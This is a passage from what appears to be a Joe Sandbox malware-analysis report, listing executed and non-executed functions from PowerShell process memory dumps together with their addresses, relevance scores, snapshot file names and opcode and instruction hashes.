                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cdb2ffe25eb48a856a80523f88577b6e843cb162e9760ecb9425f5a8fef181c
                                                                                                              • Instruction ID: ec15a84a346cb24d72f8c1df16aa3d46bc632b857c665b9b4716d70b748e8320
                                                                                                              • Opcode Fuzzy Hash: 3cdb2ffe25eb48a856a80523f88577b6e843cb162e9760ecb9425f5a8fef181c
                                                                                                              • Instruction Fuzzy Hash: 94B12A22B1E7891FE7AAD76C98A55B47BD1EF46210B0901FFD08DC71A3EE0DA9068341
                                                                                                              Function 00007FFD9B8A82CD Relevance: 1.2, Instructions: 1165COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1918506454.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c8693df121ec5b99f6d981de190a66514b3db90afa5630600f0154265e83ed2
                                                                                                              • Instruction ID: 486910fdd17a49ac9b44a175573c0dbebb6a0ab8d73a9805ef2c3ed771ca88a9
                                                                                                              • Opcode Fuzzy Hash: 1c8693df121ec5b99f6d981de190a66514b3db90afa5630600f0154265e83ed2
                                                                                                              • Instruction Fuzzy Hash: 3732C230F09A4D8FEBA9EB688474A7977E1EF59300F4500B9D04DC72E7DE28AD468721
                                                                                                              Function 00007FFD9B8A46D4 Relevance: .5, Instructions: 501COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1918506454.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 043949a02ca5cee72588e87b1f6067dd0dac5b49eacf765608bb2c77e2e4473e
                                                                                                              • Instruction ID: 88c38e40172fe4ec94228dfc7a56a0cc50b432632e9122aa95a5e3b021db6881
                                                                                                              • Opcode Fuzzy Hash: 043949a02ca5cee72588e87b1f6067dd0dac5b49eacf765608bb2c77e2e4473e
                                                                                                              • Instruction Fuzzy Hash: BEF19131A18A4D8FDF98DF5CC495AA9B7E1FF98300F19416ED449D72A6DA34F842CB80
                                                                                                              Function 00007FFD9B8A8F19 Relevance: .3, Instructions: 331COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1918506454.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c24e867b758a12b96824baeba51bbd35f96779f4be1b7ceb73e987a4bd75c353
                                                                                                              • Instruction ID: 67684c9477fea1bdcea253db8f6b82722a5ca892053de1f64b23741b477139b2
                                                                                                              • Opcode Fuzzy Hash: c24e867b758a12b96824baeba51bbd35f96779f4be1b7ceb73e987a4bd75c353
                                                                                                              • Instruction Fuzzy Hash: E6A1F420F0DA4D4FEB5DA76C5875A78B7C2DFAA340F4501BAE04DC72E7DD18AD068221
                                                                                                              Function 00007FFD9B971B5E Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56e435dcc0567ba4d6cdf35e5e6b8677e867ea0daec543823d52ca74e85b9b8a
                                                                                                              • Instruction ID: 10d8d6c492493eb8c3ee34cfc3dbc5586a271b2375e73784aa43933b6d24a23e
                                                                                                              • Opcode Fuzzy Hash: 56e435dcc0567ba4d6cdf35e5e6b8677e867ea0daec543823d52ca74e85b9b8a
                                                                                                              • Instruction Fuzzy Hash: C2414D22B1EA6D1FEBB9DAAC18A55B573D1EF84714B4900BFD449C31DBEE08ED058381
                                                                                                              Function 00007FFD9B97115B Relevance: .1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 831be1b2a8ecab5da4d71845827e8e6af446ef438df6b528843403c60d1aed40
                                                                                                              • Instruction ID: 38131e4a2549e55dd4f63d77b09f4666eaa85da6679cf4610ee5ca74ec69a5b7
                                                                                                              • Opcode Fuzzy Hash: 831be1b2a8ecab5da4d71845827e8e6af446ef438df6b528843403c60d1aed40
                                                                                                              • Instruction Fuzzy Hash: E9112C22F2EA2E1FF7B8919C28B12F463D1DF84265F0940BBD94DC76D7DE08AD054241
                                                                                                              Function 00007FFD9B9768BB Relevance: .1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e89d443a4ff7ba9bedcdc2c59984c52f4197d13d531b6ae1d2677f199402809d
                                                                                                              • Instruction ID: 90fc919ff32ff2debe58eda0c57935a45972d1a5846bd1b5eb3bfb3952aa668c
                                                                                                              • Opcode Fuzzy Hash: e89d443a4ff7ba9bedcdc2c59984c52f4197d13d531b6ae1d2677f199402809d
                                                                                                              • Instruction Fuzzy Hash: DE110622F1EA5E1FFBB8926C28B12F967D1DF84231F0901BBD94DC31D7EE08AA054251
                                                                                                              Function 00007FFD9B972FB8 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 382553e68673c87b3c197ebf0c56bd6e0da266460caeb3b3925f8fc188de9bfc
                                                                                                              • Instruction ID: e5b3d6a01db2ed6cc21e3f9bde8eeda63c685ef593481f98b017b05b1cba5582
                                                                                                              • Opcode Fuzzy Hash: 382553e68673c87b3c197ebf0c56bd6e0da266460caeb3b3925f8fc188de9bfc
                                                                                                              • Instruction Fuzzy Hash: 53115733B0DA2C4FEBA5E69C6865AF8B3D1EF59620B1401BBD509C3192EE14ED01C3C1
                                                                                                              Function 00007FFD9B971BAA Relevance: .1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac0c57b20e62cc8596361bf678d55171d5115ab4bcde8d03116e97f68e3b0356
                                                                                                              • Instruction ID: 9dee253f35d076e5eaded4d90ab8801991ec267fd0b3303d0defcbab226e41b7
                                                                                                              • Opcode Fuzzy Hash: ac0c57b20e62cc8596361bf678d55171d5115ab4bcde8d03116e97f68e3b0356
                                                                                                              • Instruction Fuzzy Hash: F3115C22F1EA2D0BF7B995AD18A51B5B3C1EF44615B4801BBD84EC3196EE08EC014381
                                                                                                              Function 00007FFD9B8A52F5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1918506454.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d028926350240131fad47a516d852f4340b90a6f95e3a73e4f77cd65169027f1
                                                                                                              • Instruction ID: 81e0c6f176c9668de096b0facecb35a1adb41f87833d1b7dfa2ee23da8c1ff59
                                                                                                              • Opcode Fuzzy Hash: d028926350240131fad47a516d852f4340b90a6f95e3a73e4f77cd65169027f1
                                                                                                              • Instruction Fuzzy Hash: E701677121CB0C4FD748EF4CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B89B4F8 Relevance: .4, Instructions: 434COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41162dd4c0721829d78fe4aa0da0342a549f7f9d2df06f485c64cb8dc4db01b9
                                                                                                              • Instruction ID: f1069abbc5d12c13ea61343ecf250d3dc8414f8698c3ba08e13318c327aa715e
                                                                                                              • Opcode Fuzzy Hash: 41162dd4c0721829d78fe4aa0da0342a549f7f9d2df06f485c64cb8dc4db01b9
                                                                                                              • Instruction Fuzzy Hash: 55118C2190F7C98FDB139B744C395947FB0AF27204B0A02DBD488CB0F3DA586959C7A2
                                                                                                              Function 00007FFD9B77F284 Relevance: .1, Instructions: 126COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1785672569.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b77d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a690c9ce85820952bdfb74f2bc0383e95039d9a550d495dfb8fd85275e488fa
                                                                                                              • Instruction ID: 7b7a55e6bdf97aa467c615c2c73674daf5ebfb984d8f00ac00bf0f6824763a02
                                                                                                              • Opcode Fuzzy Hash: 6a690c9ce85820952bdfb74f2bc0383e95039d9a550d495dfb8fd85275e488fa
                                                                                                              • Instruction Fuzzy Hash: 6B41277140EBC44FE7568B2898959523FF0EF57320B1A06DFD088CF1B3D629A846C792
                                                                                                              Function 00007FFD9B89B868 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d40ee6f17177e47871a3fa25d6c6f00dc449d84382da89fdc90d761cde0ee03
                                                                                                              • Instruction ID: 46f4dae787adbb627a4cf2d3e9eb03d17a030235ba46a928f4d1a0757442f287
                                                                                                              • Opcode Fuzzy Hash: 4d40ee6f17177e47871a3fa25d6c6f00dc449d84382da89fdc90d761cde0ee03
                                                                                                              • Instruction Fuzzy Hash: 1F21F930A0CA4C8FDB59DFAC984A7E97FE0EB9A321F04426BD449C3152DA74A456CB91
                                                                                                              Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                              Function 00007FFD9B964E1D Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786643177.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b50a1b5e078b17ee88fc939c81043bfc316d0edfba15bdf00d61102df5d15f01
                                                                                                              • Instruction ID: eab42ea9fbcaa1ffb101001278763040baa41cd9bd7fe4e27f9ede43808b4dfb
                                                                                                              • Opcode Fuzzy Hash: b50a1b5e078b17ee88fc939c81043bfc316d0edfba15bdf00d61102df5d15f01
                                                                                                              • Instruction Fuzzy Hash: 06F0BE32B0E5498FD769EB9CE4519A877E0EF4532071500BAE06DC71B3CA26ED40C740
                                                                                                              Function 00007FFD9B963694 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786643177.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 365428bd29b72c902335ec9740168e3911806b32fe1b0ec240038e5873c91a18
                                                                                                              • Instruction ID: 2b54f240f4043cb3ea25d156f278581e699c8edde44ad865e261688791129101
                                                                                                              • Opcode Fuzzy Hash: 365428bd29b72c902335ec9740168e3911806b32fe1b0ec240038e5873c91a18
                                                                                                              • Instruction Fuzzy Hash: 50F0A73131CF044FD744EE1DD445661B3D0FBA8310F10452FE449C3651DB21E8818782
                                                                                                              Function 00007FFD9B9650D0 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786643177.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4311f9931ba575c892ba019a0b1b9f100279e65b96d6414dd556d4661cb320f0
                                                                                                              • Instruction ID: afbc683dc34d1604c0ea840f5bf2ddaa51c6ddd3ab141719ca8d49303ba8d124
                                                                                                              • Opcode Fuzzy Hash: 4311f9931ba575c892ba019a0b1b9f100279e65b96d6414dd556d4661cb320f0
                                                                                                              • Instruction Fuzzy Hash: 30F05E32B0E5498FD764EB9CE4658A877E0EF0532071600B6E06DCB4B7CA25EC40C740

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B8987F2 Relevance: 11.5, Strings: 9, Instructions: 245COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-4011484131
                                                                                                              • Opcode ID: 86f1514107082895e964459ff7293c18c6499bef12c0f159d4e4cd468438d8ce
                                                                                                              • Instruction ID: 5d5baeffb7d69b51fa8da38079c5d39722383d93d3a04dbd3d80bca45d60cf46
                                                                                                              • Opcode Fuzzy Hash: 86f1514107082895e964459ff7293c18c6499bef12c0f159d4e4cd468438d8ce
                                                                                                              • Instruction Fuzzy Hash: 2861C6A3A0F6DB5BEF66076948B94A47FA0FF56BD470A02F6C8D44F0A3ED0429474251
                                                                                                              Function 00007FFD9B8987D3 Relevance: 10.3, Strings: 8, Instructions: 270COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-3427207369
                                                                                                              • Opcode ID: ff96e2cf93a46820a0ac40a9e3b71eac8f900041a5245b5602718574684f2dff
                                                                                                              • Instruction ID: 4e8795c44a55092a6654e7f2cd6832837897fa5479e2fe0fa791961021941ef6
                                                                                                              • Opcode Fuzzy Hash: ff96e2cf93a46820a0ac40a9e3b71eac8f900041a5245b5602718574684f2dff
                                                                                                              • Instruction Fuzzy Hash: D971E393A0F6DB5BFF66076948B94A47FA0EF56BD4B0A02F7C4D44F0A3EE0429474252
                                                                                                              Function 00007FFD9B898AF2 Relevance: 8.9, Strings: 7, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.1786207674.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-3904786266
                                                                                                              • Opcode ID: 9eb9d1df2220702ec9e97657c8c67986947246e0b8e56b81554a168f26bc1e6a
                                                                                                              • Instruction ID: 45d4b2579d82058e9f7af1e13f1c061b00503f54945ba3e5479e8c20b12806c3
                                                                                                              • Opcode Fuzzy Hash: 9eb9d1df2220702ec9e97657c8c67986947246e0b8e56b81554a168f26bc1e6a
                                                                                                              • Instruction Fuzzy Hash: 4E419693B0F6DB8AEA6B476958790A47FD0EF55798B4E03F7C1D88B0E3BD1429074242

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2041712089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: X7We
                                                                                                              • API String ID: 0-3338360064
                                                                                                              • Opcode ID: 625565950df8fe7845e6884f17f78caf0aac2369605f7ab68e0d078d8c767a6c
                                                                                                              • Instruction ID: c30bcc7d241ff81c24c6c5be4a7c260cbeafcc81a276ad002dcfe9372bdf3075
                                                                                                              • Opcode Fuzzy Hash: 625565950df8fe7845e6884f17f78caf0aac2369605f7ab68e0d078d8c767a6c
                                                                                                              • Instruction Fuzzy Hash: E6D15932A1FB8D9FEBA59B6858745B57BA0EF56310B0901FFD45CC70E3DA18A905C341
                                                                                                              Function 00007FFD9B89644D Relevance: .7, Instructions: 710COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c05ec22c02e61e09cd92003d114884bb2987da980973bc07ef63d791797db511
                                                                                                              • Instruction ID: dd425a928e1ba8cde87293676d8e484d7b9a85b294aea62a8c81c48d74d10924
                                                                                                              • Opcode Fuzzy Hash: c05ec22c02e61e09cd92003d114884bb2987da980973bc07ef63d791797db511
                                                                                                              • Instruction Fuzzy Hash: D3D19070A08A4D8FDF99DF5CC465AE97BE1FF68340F1541AAD40DD72A6CA34E881CB81
                                                                                                              Function 00007FFD9B89A71C Relevance: .5, Instructions: 527COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3d135a6e06d57d300378e0026a603cb14fb22430a3b6722bc4dbe94ec52c7cbb
                                                                                                              • Instruction ID: be06553ec6cff2048e19164b9b1a4b2675a5ee3d16c853c20f95de5ed1b34f6d
                                                                                                              • Opcode Fuzzy Hash: 3d135a6e06d57d300378e0026a603cb14fb22430a3b6722bc4dbe94ec52c7cbb
                                                                                                              • Instruction Fuzzy Hash: 54F1E430A08A4D8FDF98DF5CC495AA97BE1FF68300F1541AAD44DD7296DA35EC42CB80
                                                                                                              Function 00007FFD9B899EF2 Relevance: .3, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e28ad6bbf770fb5aefbee1011af0663953e44593a752800a880174702f95a675
                                                                                                              • Instruction ID: 1544a0c0fd4f3edc3cdfc2bb76243220a88e8d581a328ba0bcf9de6e702b0108
                                                                                                              • Opcode Fuzzy Hash: e28ad6bbf770fb5aefbee1011af0663953e44593a752800a880174702f95a675
                                                                                                              • Instruction Fuzzy Hash: 2F717D67A0B69D9BEF129BAC9C790E87FA0EF11659B0903F3C4D8870A3FD1515178281
                                                                                                              Function 00007FFD9B89AEF2 Relevance: .2, Instructions: 250COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5131e76b33c1c36a6fc2f7b630536cb25e64b9f7da079712dc191641bf0e6652
                                                                                                              • Instruction ID: bd068aa3b2e0ef52674473707ebc4544115bfb316b017110ccef73807e2ab623
                                                                                                              • Opcode Fuzzy Hash: 5131e76b33c1c36a6fc2f7b630536cb25e64b9f7da079712dc191641bf0e6652
                                                                                                              • Instruction Fuzzy Hash: 80714B73A0E68D4FEB118F5C9CAA5E93FA0EF55324F0902B7D4A8C70A3F92529178751
                                                                                                              Function 00007FFD9B899FE0 Relevance: .2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d24611ae4f6301fe419263d5ae54e0b450197673ddcecabe1ec5a5863d7120b6
                                                                                                              • Instruction ID: c5412e0a26aaeb2872f53b8387e2dc236f797b3fb6f9f7f6fde8da0ff11baed3
                                                                                                              • Opcode Fuzzy Hash: d24611ae4f6301fe419263d5ae54e0b450197673ddcecabe1ec5a5863d7120b6
                                                                                                              • Instruction Fuzzy Hash: 38414D67A0B6DE9BFF124B6C9C694E43F60FF15B55B0503B3C498860A3ED2515478681
                                                                                                              Function 00007FFD9B77ED40 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2039493783.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4ca2697384756f4c6b5ea543fe00f79b9e3cc2c2f299625797fbe384ed26c9de
                                                                                                              • Instruction ID: 9970ff7c891f4e0322b4b38bccf4bd308807b3831ea7b8e24a0b305db681a72b
                                                                                                              • Opcode Fuzzy Hash: 4ca2697384756f4c6b5ea543fe00f79b9e3cc2c2f299625797fbe384ed26c9de
                                                                                                              • Instruction Fuzzy Hash: A941083050EBC44FE7579B299C959523FF4EF57220B1A06DFD088CB1B3D629A846C792
                                                                                                              Function 00007FFD9B89977A Relevance: .1, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c69c8b78db86a15ed674c3f2ccd8333d8c7c1b26c1b7fcc19c7f7fdc3c123e71
                                                                                                              • Instruction ID: 50b8e870ac951617bc60703d6fc5b229a222028c08b0c168c1f93cdb856c135d
                                                                                                              • Opcode Fuzzy Hash: c69c8b78db86a15ed674c3f2ccd8333d8c7c1b26c1b7fcc19c7f7fdc3c123e71
                                                                                                              • Instruction Fuzzy Hash: A331B23191CB4C9FDB189B5CA80A6A97BE0FB98311F00422FE449D3251DA70A856CBC2
                                                                                                              Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
